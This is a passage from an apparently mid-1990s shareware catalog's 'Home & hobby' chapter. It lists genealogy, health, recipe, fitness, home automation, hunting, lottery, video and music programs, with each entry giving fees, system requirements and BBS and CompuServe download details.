(add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + graphics; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: TRD111.ZIP on BBSs (call +44-(0)1242-232623 to download + it at no charge); TREDRW.ZIP on CompuServe in CIS:ROOTS forum + LIBrary 2 (or contact userID 100101,1155 for assistance). + SWREG#: 3200 + PsL#: 11528 + Download size: 337k (about 25 minutes with a 2400 baud modem) + Description: + A specialist graphics editor for creating high quality + genealogical drop-line charts. Descendant and ancestral trees + may be imported direct from Kith and Kin tree files or from PAF + GEDCOM files created by other genealogy programs. Converts + these trees into easily edited picture elements which can then + be re-formatted and re-arranged before storing and printing. It + is now easy to produce perfectly laid out charts and + incorporate pictures, diagrams and other simple graphics. + + + 15.9 Ham radio + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 359. + + Product: RADIOSIM + Simulation of a radio-electric link. See full description on + page 359. + + Chapter 15, "Home & hobby" 544 + + + + 15.10 Health + + Product: ShotZ + Author: , 816-429-3558 + Version: 3.00 (01-15-92) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $5.00 + Registration benefits: 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: SHOTZ300.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SHOTZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + Download size: 233k (about 18 minutes with a 2400 baud modem) + Description: + Originally designed to handle immunization tracking for a USAF + Reserve unit, this program has been "adopted" by many non- + profit organizations and families as an easy way to track + immunization due dates. Handles up to 10,000 people for 12 + different immunizations. User can change immunization tracked + and dues dates as the need arises. Prints or allows viewings + of lists and produces letters when shot is overdue. All + proceeds from this program go to the American Red Cross. + + + 15.10.1 Food/dietary/kitchen + + Product: From Scratch recipe processor + Author: , 516-493-3422 + Version: 3.04 (11-01-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $34.95 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to U.S. addresses) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, CompuServe, mail support; lifetime + return policy; bonus data; all ASP-wide offers (see page 5). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; FS*.ZIP on CompuServe in + CIS:COOKS forum LIBrary 0 (multiple files) (or contact userID + 74676,3314 for assistance). + SWREG#: 2554 + PsL#: 10678 + Download size: 1k (about one minute with a 2400 baud modem) + Description: + Easy to use Windows recipe program! Unlimited number of + ingredients per recipe, and any number of recipes. + Sophisticated printing with combination of fonts. Complete + + Chapter 15, "Home & hobby" 545 + + + + search capability, yield conversion, fractions, shopping list, + and more. Calculates nutrition information from a 4400 item + USDA database. Prints on 3X5 cards. Converts from Meal Master, + Compu-chef, and Micro Kitchen recipes, as well as allows + swapping recipes with other From Scratch users. Stores data in + dBase IV compatible files. + + + Product: Grocery Manager for Windows + Author: + Version: 2.31 (11-05-94) + Needs: IBM AT (80286), Windows 3.1 or better. CGA monitor; Hard + disk; Mouse; VBRUN200.DLL. + Strongly recommended: VGA monitor. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 1-month return + policy; discounts on other products. 12-month free upgrading + allowed. + Look for: GMW231.ZIP on BBSs (call 715-652-2758 to download it at + no charge); GMW231.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 72327,1673 for assistance). + PsL#: 10646 + Download size: 460k (about 34 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Helps you do your meal planning and grocery shopping. + Simplifies and speeds up the process of making a menu and + shopping list. You input how many days you would like to plan + meals for, then what dishes you want to have on each day. The + ingredients that each dish is made of are saved (part of the + setup process), so when a meal is planned for a certain day, + the ingredients for that meal will be automatically included in + a shopping list it generates. + + + Product: Heart Smart [***] + Author: , 804-823-6896 + Version: 2.0 (04-25-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + + Chapter 15, "Home & hobby" 546 + + + + page 5); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; HSMART.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Designed to help you eat healthier and help your heart out. Has + a modifiable food list of 900 items and allows you to plan a + 7-day menu and print the menu out to a graphics printer. Keep + calorie counts by meal, by the day, or for the whole week. + Automatically computes the percentage of fat in your diet. + Print preview function and ability to copy entire meals are + just two of the new functions. + + + Product: LEANER + Author: , 505-982-7251 + Version: 2.20 (11-22-93) + Needs: IBM PC, DOS 2.11 or better. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 5); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: LEAN220.ZIP on BBSs (call 505-662-0659 to download it + at no charge); LEAN22.ZIP on CompuServe in CIS:GOODHEALTH forum + LIBrary 10 (or contact userID 71021,3617 for assistance); + LEAN220.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + Find your ideal weight. Discover your cardiovascular risks. + Check your anxiety level. Determine your eating style. Graphs + & reviews your daily, monthly & yearly progress. Tracks over + 45 different exercises. Handles groups, while password + protection ensures personal data privacy. Handles metric and + english weights and measures. Supports international date + format. Has had rave reviews. And has been found effective + for individuals and fittness salons. + + + Product: Managing Your Food + Tracks food cost, nutrition, and inventory. See full + description on page 309. + + Product: Me & My Metabolism + Effects of lifestyle on your energy balance. See full + description on page 479. + + Chapter 15, "Home & hobby" 547 + + + + Product: MicroCook + Author: , 414-632-9815 + Version: 1.81 (06-23-95) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Mouse; Epson printer. + Registration fee: $20.00 (add $2.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + GEnie, mail support; 3-month return policy; bonus utilities; + bonus data; all ASP-wide offers (see page 5); discounts on + upgrades. 24-month free upgrading allowed. 1 free update + disk(s) sent out. Bonus recipes. + Look for: MCOOK181.ZIP on BBSs (call 414-878-2106 to download it + at no charge); MCOOKN.ZIP on CompuServe in CIS:COOKS forum + LIBrary 0 (or contact userID 72713,1667 for assistance); + MCOOK181.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID NORSKI for assistance). + SWREG#: 3595 + PsL#: 14025 + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + A recipe collection management program for DOS with easy to use + editor, pull-down menus, and with full mouse support. Number of + recipes and databases only limited by hard disk space. Import + and Export recipes in ASCII format, and will Import ASCII + recipes from Meal-Master, MasterCook and Edna's. Powerful + searches. Duplicate recipe checking. Print to any printer, or + to disk file. Recipes included. Works great in Windows too! + + + Product: Program for a Small Planet + Author: , 800-783-9544 + Version: 6.0 (10-26-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Dual 720k floppy drives. + Strongly recommended: CGA monitor; Hercules monitor; Hard disk. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + 1-month return policy; bonus data; all ASP-wide offers (see + + Chapter 15, "Home & hobby" 548 + + + + page 5); disks of other shareware; discounts on other products. + 6-month free upgrading allowed. + Look for: FOODSM60.ZIP on BBSs; FOODSM.EXE on CompuServe in + CIS:GOODHEALTH forum LIBrary 10 (or contact userID 72317,2332 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Finds healthy and delicious food combinations. We combine + foods based on "Diet for A Small Planet" by Frances Moore + Lappe. We include calorie, sodium, cholesteral, fat, fiber and + protein counts. Has computerized pantry and graphics. Develops + combinations naturally the way traditional food dishes evolve. + + + Product: Windows Gourmet + Author: , 801-221-4527 + Version: 1.2 (01-01-95) + Needs: IBM 80386, Windows 3.1 or better. 1000k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades; + registration commissions. 3-month free upgrading allowed. + Look for: WNGOUR12.ZIP on BBSs (call 801-224-4031 to download it + at no charge); WNGOUR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 19 (or contact userID 74552,1027 for assistance). + SWREG#: 3167 + PsL#: 11406 + Download size: 339k (about 25 minutes with a 2400 baud modem) + Description: + A powerful, easy to use recipe database and meal planning + system. Familiar "recipe card" display and simple interface + allows for quick entry and indexing of hundreds of recipes. + Easily group a series of recipes together into a single meal + and adjust servings to account for any yield. Prints shopping + lists, as well as individual recipes. Can retrieve and save + Meal Master text files. + + Chapter 15, "Home & hobby" 549 + + + + 15.10.2 Exercise/fitness + + Product: AeroChart + Author: , 505-982-7251 + Version: 1.20 (12-12-93) + Needs: IBM PC, DOS 2.11 or better. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; lifetime return + policy; bonus utilities; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + Look for: AC120.ZIP on BBSs (call 505-662-0659 to download it at + no charge); AC120.ZIP on CompuServe in CIS:GOODHEALTH forum + LIBrary 7 (or contact userID 71021,3617 for assistance); + AC120.ZIP on GEnie in IBMPC forum LIBrary 3. + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Aerobic exercise logbook. Helps you formulate a set of easy to + reach exercise goals and attain them. Graphs and reviews track + daily, monthly, and yearly progress. Supports groups. Password + protection ensures privacy for personal data. Calculates Cooper + Aerobic Points and calories expended (45+ activities). Add your + own exercise, goals, routines, and strategies. Displays + english and metric weights and measures. Automatically converts + between systems. Supports international date format. + + + Product: Bike [***] + Author: , 804-823-6896 + Version: 4.0 (10-01-95) + Needs: IBM 80386, Windows 3.1 or better. 200k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $15.00 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 5); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; BIKE40.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Useful for the casual as well as the serious rider. Keep track + of miles ridden, average speed, average ride, etc. Display + information in numerical or graphics form. Print your ride log + and start with a fresh database every year. Features the + ability to customize two fields for your particular training + + Chapter 15, "Home & hobby" 550 + + + + regimen. Data can be exported to another database program or + spreadsheet. + + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 127. + + Product: From Scratch recipe processor + Recipe database for Windows with nutrition. See full + description on page 544. + + Product: LEANER + Weight control charting & motivation program. See full + description on page 546. + + Product: Me & My Metabolism + Effects of lifestyle on your energy balance. See full + description on page 479. + + Product: Program for a Small Planet + Finds healthy and delicious food combinations. See full + description on page 547. + + + 15.11 Household automation + + Product: Around The House + Complete personal/home information manager. See full + description on page 138. + + Product: Chores & Rewards + Author: , 919-365-6027 + Version: 1.00 (01-01-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter, mail support; + 3-month limited return policy; all ASP-wide offers (see + page 5). 3-month free upgrading allowed. 3 free update disk(s) + sent out. + Look for: availability unknown on BBSs; CHORES.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 71652,634 + for assistance). + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + System for managing childrens chores, rewards and penalties + featuring: 3 motivation/compensation methods; automatic + compensation reconciliation; performance tracking; "bank + account" management; and checklist printing. + + Chapter 15, "Home & hobby" 551 + + + + Product: JRE Home Inventory + Author: + Version: 6.3 (09-30-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 5); discounts on upgrades. 3-month free + upgrading allowed. + Look for: HOMI63.ZIP on BBSs (call 602-814-0483 to download it at + no charge); HOMI63.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 225 + Download size: 520k (about 39 minutes with a 2400 baud modem) + Description: + Keeps track of all your household items for insurance purposes. + Eleven different types of reports with many options for + tailoring. True print preview, ability to change printer and + screen fonts, plus much more! Categorize items by location, + room, insurance category, and personal category. + + + Product: Smart10 + Author: + Version: 2.1 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. X10 PowerHouse CP290. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 36-month free + upgrading allowed. + Look for: availability unknown on BBSs; SMRTEN.ZIP on CompuServe + in CIS:PCHW forum LIBrary 4 (or contact userID 71046,1476 for + assistance). + PsL#: 10400 + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + Devised to overcome limitations of the CP290 and its software. + It maintains a year's calendar of events. Use Sunrise and + Sunset as times. Events can beconditioned to occur (or not) if + it is dark (or light), between dates you have specified, or on + command line parameters. + + Issue direct or delayed commands and cancel pending events. + Automate AUTOEXEC.BAT to compare the computer's date-time with + target date-times, and adjust clock for daylight savings time. + + Chapter 15, "Home & hobby" 552 + + + + Product: Super!Market + Author: , 216-974-5189 + Version: 1.10 (12-01-93) + Needs: IBM AT (80286), DOS 3.1 or better. Hard disk. + Strongly recommended: HP LaserJet printer. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5). + Look for: SUPMK*.ZIP on BBSs (call 703-680-9269 to download it at + no charge); SUPMK*.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 7 (or contact userID 70700,3555 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A Windows-based home productivity product used to create a + shopping list that includes prices and aisle numbers. The list + can be printed in aisle sequence with or without pricing + information. Exploits the advantages of windows facilities in + Windows or OS/2 so that operations are quick and accurate. + International customization is allowed for currency type, + decimal style, and date presentation. + + + Product: TMC Calendar & Phone Book + Calendar & phone book with phone dialer. See full description + on page 120. + + Product: WinPrice + Picks best deal from any two choices. See full description on + page 356. + + + 15.12 How-to projects + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 500. + + + 15.13 Hunting & fishing + + See also: Home & hobby, Sports, Firearms. + + Chapter 15, "Home & hobby" 553 + + + + Product: The Deer Expert + Author: , 800-783-9544 + Version: 4.2 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited tollfree 800# phone, CompuServe, mail + support; 1-month return policy; bonus data; all ASP-wide offers + (see page 5); disks of other shareware; discounts on other + products. + Look for: DEERHU42.ZIP on BBSs; DEERHU.EXE on CompuServe in + CIS:OUTDOOR forum LIBrary 6 (or contact userID 72317,2332 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Gives you over 100 methods for gun hunting of whitetail deer. + Has techniques for doe, small bucks, and recovery of wounded + deer. When you purchase you get bonus techniques for medium, + large bucks, recipes, and more. Also has a library of + information and an extensive logging facility! Valuable safety + information is a must! + + + Product: The Fish Expert + Author: , 800-783-9544 + Version: 3.2 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. 6-month free upgrading allowed. + Look for: FISHEX32.ZIP on BBSs; FISHEX.EXE on CompuServe in + CIS:OUTDOOR forum LIBrary 5 (or contact userID 72317,2332 for + assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Contains fishing patterns and techniques as well as a fishing + log system. Recommended in Outdoor Life magazine and elsewhere. + You input conditions you fish under and program gives proven + methods to catch trout. Library, logs help you capture your own + data base. + + Chapter 15, "Home & hobby" 554 + + + + Product: Fishtime + Author: + Version: 3.5 (09-12-95) + Needs: IBM PC, DOS 2.0 or better. 100k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $15.00 + Registration benefits: printed manual; 6 months of unlimited + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 5). + Look for: FSHTME35.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 60k (about five minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Hunters and fisherman have long known that a relationship + exists between the phase and position of the moon and the + activity and feeding patterns of fish and game. This calculates + the best times to hunt and fish on any given day for any + location in the continental United States based on the phase + and position of the moon. The output is a graph plotted on the + screen showing the probability of success for the 24 hour + period selected. Prime time lists are also provided. + + + Product: QBALL + Small arms exterior ballistics. See full description on + page 578. + + + 15.14 Lottery + + Product: Lotto Challenger + Author: , 813-653-3093 + Version: 3.8 (05-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk; Epson printer. + Registration fee: $29.50 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; 1-month return policy; bonus data; all ASP-wide + + Chapter 15, "Home & hobby" 555 + + + + offers (see page 5); discounts on other products; discounts on + upgrades. 2-month free upgrading allowed. + Look for: LOTTOC38.ZIP on BBSs (call 813-653-4034 to download it + at no charge); LOTTOC.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 72356,354 for assistance). + SWREG#: 2580 + PsL#: 11326 + Download size: 134k (about ten minutes with a 2400 baud modem) + Description: + Picks the best numbers to play based on a statistical analysis + of previously drawn lottery numbers. This is not a random + number generator. The numbers picked can be played in any of + the 20 wheeling systems that are included. Other wheeling + systems can be added if desired. Checks the tickets played + against the numbers drawn for winning matches. Includes many + charts that help you handicap lottery numbers. Works with all + lotteries that pick 5 or 6 numbers, including Powerball. + + + Product: LOTTO MANIA + Author: , 613-591-5525-(HOME) + Version: 2.01 (01-01-95) + Needs: IBM PC, DOS 2.1 or better. Hard disk; Epson printer. + Strongly recommended: CGA monitor. + Registration fee: $15.00 (add $15.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited CompuServe, mail + support; bonus data; all ASP-wide offers (see page 5); + discounts on upgrades. + Look for: LTMAN20*.ZIP on BBSs. + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + LOTTO MANIA v2.01 . Menu driven, supports multiple + lotteries based on 6 numbers drawn. Popular US and Canadian + databases and user support provided to paid users, otherwise + user enters their own numbers. Sample database included. + Contains number picking algorithms based on user specified + criteria. Easy to use, advanced error checking, built-in + context sensitive help. Registered users required to pay + $15.00. See also VENDINFO.DIZ for further details. + + + Product: Lotto Prophet + Author: , 813-629-7720 + Version: 5.0 (01-05-95) + Needs: IBM PC, DOS 2.11 or better. at least 1 720k floppy. + Registration fee: $19.50 + Registration benefits: + Look for: PROPHET5.ZIP on BBSs (call 813-766-0780 to download it + at no charge); PROPH5.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 71251,2123 for assistance); + + Chapter 15, "Home & hobby" 556 + + + + PROPHET5.ZIP on GEnie in IBM forum LIBrary 7 (or contact userID + GDAVIS13 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Lotto Prophet Ver 5.0 Provides more HOT statistical algorithms + than any lottery program on the market today and has a history + of picking BIG winners. New instant State of Lottery Report. + Supports Pick 5,6,7, Keno & PowerBall. Reports by Trips, Quads, + PowerDue, Hot, Overdue, Most Likely, Friends & Fate. Complete + Data File Control. Wheeling Systems. Picks, Stores & Checks for + WINNERS. LP has had winners in the USA, New Zealand, Canada, + Australia, Cyprus & Ireland. + + + Product: Lotto Thunder (PICK-6 Version) + Author: + Version: 1.4 (05-01-95) + Needs: IBM PC, DOS 5.0 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Epson printer; + EMS memory; XMS memory. + Registration fee: $20.00 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + CompuServe, newsletter, mail support; runtime license; + discounts on other products. + Look for: LOTTOT14.ZIP on BBSs; LOTT14.ZIP on CompuServe in + CIS:PCFUN forum LIBrary 9 (or contact userID 72747,2474 for + assistance). + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A complete lotto prediction and number systems program. Has + four completely different methods of predicting lotto numbers. + Wheel systems up to 54 numbers, multiple level predictions, + save predictions, scan for winners, scan for past performance, + auto and manual execution of prediction methods, no game limit. + Pull down menus, in-memory scanning, support for expanded + memory. Graphs, pie, bar, line, and time-series graphs. + + + Product: Windows Lotto + Author: , 813-653-3093 + Version: 1.1 (05-01-94) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; Epson printer; VBRUN100.DLL. + Registration fee: $35.95 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; bonus data; all ASP-wide offers (see + + Chapter 15, "Home & hobby" 557 + + + + page 5); discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. + Look for: WINLOT11.ZIP on BBSs (call 813-653-4034 to download it + at no charge); WINLOT.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 72356,354 for assistance). + SWREG#: 2581 + PsL#: 11327 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Picks the best numbers to play based on a statistical analysis + of previously drawn lottery numbers. The numbers picked can be + played in any of the 24 wheeling systems that are included. You + can substitute your own systems if desired. Checks game tickets + for winning matches. Many statistical charts and graphs are + included that help to handicap the lottery numbers. Works with + all lotteries that pick 5, 6 or 7 numbers, including Powerball. + + + 15.15 Movies & video tapes + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 626. + + Product: Video Librarian + Author: , 404-516-8575 + Version: 4.02 (12-31-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie, + mail support; bonus data; discounts on other products. + Look for: VLB402.ZIP on BBSs (call 703-680-9269 to download it at + no charge); VLB.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); VLB402.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 273k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Full featured menu-driven database manager that catalogs video + libraries like no other. 14 database management functions + available from data entry screen. Holds 18 fields of + information about each title. Has very fast search and find + routines. Prints reports to the screen, printer or disk. Prints + labels on regular or custom labels for cassettes. Mouse + support, context sensitive help, moveable, re-sizeable browse/ + find screens. Memo field for movie synopsis. + + Chapter 15, "Home & hobby" 558 + + + + Product: VideoMaster + Helping you *master your video collection. See full + description on page 528. + + Product: VideoMaster For Windows + Helping you *master your video collection. See full + description on page 528. + + + 15.16 Music + + See also: Education, Music. + + Product: AlbumMaster + Easily catalog your album collection. See full description on + page 521. + + Product: AlbumMaster For Windows + Helps you *Master your album library. See full description on + page 521. + + Product: AMF Intelligent Organ for Win + Author: + Version: 1.0 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. sound card. + Registration fee: $11.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: ORGAN.ZIP on BBSs; ORGAN.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 7 (or contact userID 74250,1700 for + assistance). + SWREG#: 3236 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + A Casio-like organ synthesizer for Windows. Play 127 + instruments in 5 octaves with your mouse. Has recording and + playback capabilities. When playing back, it actually looks + like someone is playing the piano. Easy to use. Realistic- + looking keyboard. + + + Product: CassetteMaster + The best way to catalog your cassettes. See full description + on page 523. + + Product: CassetteMaster For Windows + The best way to catalog your cassettes. See full description + on page 523. + + Chapter 15, "Home & hobby" 559 + + + + Product: CD-Box + Author: , 415-497-5573 + Version: 3.03B (08-11-93) + Needs: IBM AT (80286), DOS 3.3 or better. 640k RAM; VGA monitor; + Mouse. AdLib or SoundBlaster card. + Strongly recommended: Hard disk. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of unlimited phone, mail support; 6-month return policy; + bonus utilities; discounts on other products. + Look for: CDBOX303.ZIP on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A VGA/mouse player/playback shell to play music on an AdLib or + SoundBlaster card (or better). It provides a common high-level + interface to multiple sound file formats (.CMF .MID .MOD .MUS + .ROL .VOC .WAV and user-defined) with extras: pause & repeat & + volume control, multiple and random song selection, automatic + handling of bank files, song titles and lengths, playback from + .ARC, .ARJ, .PAK and .ZIP archives, nice graphics and funny + animations! + + + Product: CDMaster + Helping you to *master your CD library. See full description + on page 524. + + Product: CDMaster For Windows + Author: , 816-429-3558 + Version: 3.10 (01-29-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; VGA monitor; + Dual 720k floppy drives; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; bonus graphics; all + ASP-wide offers (see page 5); disks of other shareware; + discounts on 